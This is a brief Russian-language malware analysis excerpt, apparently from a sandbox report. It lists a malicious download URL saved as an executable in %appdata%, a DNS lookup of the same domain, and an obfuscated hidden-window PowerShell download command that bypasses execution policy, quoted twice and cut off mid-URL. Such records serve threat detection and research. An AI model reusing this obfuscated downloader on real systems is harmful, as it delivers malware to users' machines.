Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^WER^SHelL.E^x^E ^-^Ex^EcuT^i^ONP^O^l^icY ^B^ypA^sS -^n^OPRo^FIlE^ ^-^W^I^n^dOWS^T^yLe ^hidd^E^n ^(nEW^-oBject s^y^S^Tem.N^eT.^WEBC^Lient).do^w^NL^oaD^FIL^e(^'http://homet...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /c "pO^WER^SHelL.E^x^E ^-^Ex^EcuT^i^ONP^O^l^icY ^B^ypA^sS -^n^OPRo^FIlE^ ^-^W^I^n^dOWS^T^yLe ^hidd^E^n ^(nEW^-oBject s^y^S^Tem.N^eT.^WEBC^Lient).do^w^NL^oaD^FIL^e(^'http://homet...' (со скрытым окном)